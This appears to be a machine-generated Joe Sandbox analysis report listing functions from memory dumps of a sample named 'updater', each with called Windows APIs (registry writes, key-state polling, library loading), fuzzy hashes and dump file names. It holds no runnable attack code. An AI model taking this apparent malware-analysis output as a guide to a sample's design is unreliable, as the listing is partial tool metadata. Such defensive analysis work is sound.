Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: A631D170B005099BC71ADF58C4E0969F7A6FF49340F658AA5E40ACB661EB31EDC1CB80

Function 0034E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0034E2EA

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 08ad6b2a97224bf421ffd12773b1779c5aac0a71127197fde4f48d90e0c09489
Instruction ID: 044b841eaf72fadd21e65c112330e4be8ec1f3efee8096cc8ae2433e0b0e169f
Opcode Fuzzy Hash: 08ad6b2a97224bf421ffd12773b1779c5aac0a71127197fde4f48d90e0c09489
Instruction Fuzzy Hash: BE410974508351DFDB1ADF54C495B5ABBE1BF49308F0A88ACE8894B362C371EC85CB52

Function 003249C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00324B29: FreeLibrary.KERNEL32(00000000,?), ref: 00324B63

Part of subcall function 0033547B: __wfsopen.LIBCMT ref: 00335486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003227AF,?,00000001), ref: 003249F4

Part of subcall function 00324ADE: FreeLibrary.KERNEL32(00000000), ref: 00324B18

Part of subcall function 003248B0: _memmove.LIBCMT ref: 003248FA

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 3e1d09a03fc7fcbce6d1c793d0bc2ae43e7e378a1d4c1d8808eed566f314d8fe
Instruction ID: f6372d00ab21ee3e70263c38266c9a14346a782a9390582ee1e5721577bf1270
Opcode Fuzzy Hash: 3e1d09a03fc7fcbce6d1c793d0bc2ae43e7e378a1d4c1d8808eed566f314d8fe
Instruction Fuzzy Hash: 4011E332650225ABCB16FB70EC06FAE77A99F40701F10842DF582AE191EB759A10AB94

Function 0034E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0034E3CE

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 205f4474476fc70b0f4623079ed3464c6f4a810bc6e4e981a732ea4229ecc36b
Instruction ID: c0df0cf51003d5b495aed0842af54bbc71bdf114142916d768e70f72b8937b3a
Opcode Fuzzy Hash: 205f4474476fc70b0f4623079ed3464c6f4a810bc6e4e981a732ea4229ecc36b
Instruction Fuzzy Hash: 0821E4B4508341DFDB1ADF54C445A5ABBE5BF89304F05896CF88A5B722C731E889CB52

Function 016E5B0D Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 016E5B86

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: c5afd7faac8cf4cb0c157b77ab942761d5071a40acbf80287c8416df1d99cb58
Instruction ID: 06b370cd8241b47278ed4e0fbf8366c1cd9533ef3e777f53d03be8640e41b0b1
Opcode Fuzzy Hash: c5afd7faac8cf4cb0c157b77ab942761d5071a40acbf80287c8416df1d99cb58
Instruction Fuzzy Hash: E011C1B8D00309AFCF00DF99DC918AEBBF9FB48714B51856AE915A7311D734AE118F94

Function 00324220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00323CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00324276

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 675dee5d93c5250fe17a1363da3a34bdc870e7ff32b78dd26d1d2dd1d1a327fd
Instruction ID: 5515e30ff73139986b55f13a608017c53b921172d16ac22ace84b891d897d143
Opcode Fuzzy Hash: 675dee5d93c5250fe17a1363da3a34bdc870e7ff32b78dd26d1d2dd1d1a327fd
Instruction Fuzzy Hash: 15113A31200B11DFD322CF56E480B62B7F9EF88710F10C92DE8AA86A50D7B0E845CB60

Function 016EAEF3 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 016EAF26

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8739ae6006885a091230a1e0c36cffb7c9a3259594e426721dd30fcd984b30ac
Instruction ID: 13ce91b99e5a2853d0ea9f08cb902c6c41585d8f5890f0a21e9807ddbc8531bf
Opcode Fuzzy Hash: 8739ae6006885a091230a1e0c36cffb7c9a3259594e426721dd30fcd984b30ac
Instruction Fuzzy Hash: FFF0A475A00148BBD700DAEDCC80FAABBED9B68250F008269F91CCB390DA319D0087A0

Function 016EAEF5 Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 016EAF26

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4f120a262ce04b024ce865b4f1840687a5534e791c9b6ebd7109f4094e5b9832
Instruction ID: 1163310da498a456413382f0f756077c850ec9777aac14337bd219b37deb8990
Opcode Fuzzy Hash: 4f120a262ce04b024ce865b4f1840687a5534e791c9b6ebd7109f4094e5b9832
Instruction Fuzzy Hash: 90F0A475A00148ABD700DAEDCC80F9ABBED9B68250F008269F91CCB390DA319D0087A0

Function 00377C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

_memset.LIBCMT ref: 00377CB4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
Instruction ID: 2f0aa8bb4fe34f6dc83699e54a38fe09c84d8bb343ee63d1adf3ac4d726186bc
Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
Instruction Fuzzy Hash: 4201E4746042019FD326EF5CD581F45BBE5AF59310F24C45AF5888F3A2DA72A840CB90

Function 016D4C89 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,00010000,?,00001000), ref: 016D4CBB

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction ID: 11fadb038ba4123abef038d477fbb2581d6f5035d1ce1be5cd0e6ae0e9947363
Opcode Fuzzy Hash: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction Fuzzy Hash: 3BF0A975B002019FCB01EAACCCC0FA632ED9B5C241B0480A9B608CB308EFB0CC4183A6

Function 0034DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

_memmove.LIBCMT ref: 0034DC8B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
Instruction ID: 49cb87a27794430369ef8b1544c2d43c96219fe871ca2ee78c51dac087b478d3
Opcode Fuzzy Hash: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
Instruction Fuzzy Hash: B8F0F974604101DFD71ADF68CA91E15BBE1BF1A300F24849CE1898F3A2E732E851CF91

Function 00324A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00324AA4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: b4ae826f78b3b57ad5ccd1d6eb520fb9dfa0d94faa60aea70eaab1c0e9322753
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 4DF08CB6400208BFDF168F54DC00CEB7B7DEB85320F004198F9045A110D232EA219BA0

Function 00324A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,003227AF,?,00000001), ref: 00324A63

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8bce5a8e841fd58dc9b23ad43146e2f3043fcc7ed11cfc1b0f57fa92f9c07f2b
Instruction ID: 66fa017d926ae4483ea64e886b6576f33940177c779fc49cc45deb805dcd42da
Opcode Fuzzy Hash: 8bce5a8e841fd58dc9b23ad43146e2f3043fcc7ed11cfc1b0f57fa92f9c07f2b
Instruction Fuzzy Hash: C1F01571145721CFCB369F64F490816BBF4AF14325321892EE1D783A10C731A984DF44

Function 00350A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00350A84

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 15f278dd3f9965a8369fbe9bffda1ba21d33cb9e96d11a3a8a4439118e2e6832
Instruction ID: ff9b622e0d354d71c4f50636631211e86e26005f30c657bc876c81a36079dd80
Opcode Fuzzy Hash: 15f278dd3f9965a8369fbe9bffda1ba21d33cb9e96d11a3a8a4439118e2e6832
Instruction Fuzzy Hash: 67E0ABB17483014EE73F8B689404F62FBE8AB00312F00041AD88582640E37798D897B1

Function 00324AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00324AD0

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 372fb4e686daeb9c4efd0a946c47af647da05102a4769677a2b645c2d939a9c4
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: B2F0F87250020DFFDF05CF90C941EAABB79FB14314F208589F9198B212D336DA21ABA1

Function 016D4129 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00310000,?,00000105), ref: 016D4147

Part of subcall function 016D43BD: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 016D43D8
Part of subcall function 016D43BD: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 016D43F6
Part of subcall function 016D43BD: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 016D4414
Part of subcall function 016D43BD: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 016D4432
Part of subcall function 016D43BD: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,016D44C1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 016D447B
Part of subcall function 016D43BD: RegQueryValueExA.ADVAPI32(?,016D463D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,016D44C1,?,80000001), ref: 016D4499
Part of subcall function 016D43BD: RegCloseKey.ADVAPI32(?,016D44C8,00000000,00000000,00000005,00000000,016D44C1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 016D44BB

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction ID: fba77d4435a94c455c6fec38e24242d33474cea1ff47f1771e2bf89c030661fb
Opcode Fuzzy Hash: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction Fuzzy Hash: 02E03971A003208BCB10DEACCCC0B5633D8AB08655F004555AC54DF346D7B0DD1087D4

Function 003309C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003309E4

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 2151097895adb00e874beec02f6a4db2994384cef1b4d7ffa6b9892aba4fffba
Instruction ID: 71e99cb53c71d02016a41a5e07f09895a145fa537d81a67bad6396c876f1328a
Opcode Fuzzy Hash: 2151097895adb00e874beec02f6a4db2994384cef1b4d7ffa6b9892aba4fffba
Instruction Fuzzy Hash: 16E0863690012857C72296989C05FEAB7DDDB89790F0401B6FC08DB344D960AC818691

Function 016D692D Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,016E852F,00000000,016EA93F,016EAAE5,?,c:\,016EAAE5,?,c:\), ref: 016D6938

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction ID: e672d1558d9034ebda2e389fd85329f1f1636f9ab6b7855a13d91341522a72fd
Opcode Fuzzy Hash: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction Fuzzy Hash: 60C02BF1F012020A2E1061FE4DC00C903CD492C0353211F26F03DC63C7DB51E0232019

Function 003242AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,003606E6,00000000,00000000,00000000), ref: 003242BF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 781a625a16c28468902090f31109a5252ab8a00ab28581dad59a9d5a0fc8cad8
Instruction ID: 3a0186609f5cdb5e871baa8df6238c40487b902b61dbb2de13068a936e91fd72
Opcode Fuzzy Hash: 781a625a16c28468902090f31109a5252ab8a00ab28581dad59a9d5a0fc8cad8
Instruction Fuzzy Hash: D5D0C77464020CBFE715CB80DC46FA9777CE705710F100294FD0466290D6B27D508795

Function 003113C7 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 003113C8

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

Part of subcall function 00312714: GetCursorPos.USER32(?), ref: 00312727
Part of subcall function 00312714: ScreenToClient.USER32(003D77B0,?), ref: 00312744
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000001), ref: 00312769
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000002), ref: 00312777

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
String ID:
API String ID: 4074248120-0
Opcode ID: ce2cf884c4ab67ec5ad0d1c5b1657e44038c3b45b2ec29d3ca45e8959a63a6ec
Instruction ID: aabe85d560acee047ca0e23be9cc259fc673e2cb006fda11e5530d75d6e89197
Opcode Fuzzy Hash: ce2cf884c4ab67ec5ad0d1c5b1657e44038c3b45b2ec29d3ca45e8959a63a6ec
Instruction Fuzzy Hash: 0ED05E352010204BC51FA72CAC4AA9F3755EB49320B140A52F4258B2E2CB211CA2CAA2

Function 016D6C45 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,016E853A,00000000,016EA93F,016EAAE5,?,c:\,016EAAE5,?,c:\), ref: 016D6C52

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction ID: e8daed93801cd931632889833bc6ade52304f4aa0458ddd6d5896298ec6385f0
Opcode Fuzzy Hash: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction Fuzzy Hash: 09B012E3F503811BEE0035F90CC0F2E018EE738806F100C79F102C6742EC6BC8084095

Function 0033547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00335486

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 3c97f7c5414a111479f9aa3779f1108c24abc0904b6f66b3dd48c850f52de919
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 8AB0927644420C77CE022A82EC03A593B299B40668F408020FB0C5C162A673A6A09689

Function 0037D6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0037D842

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
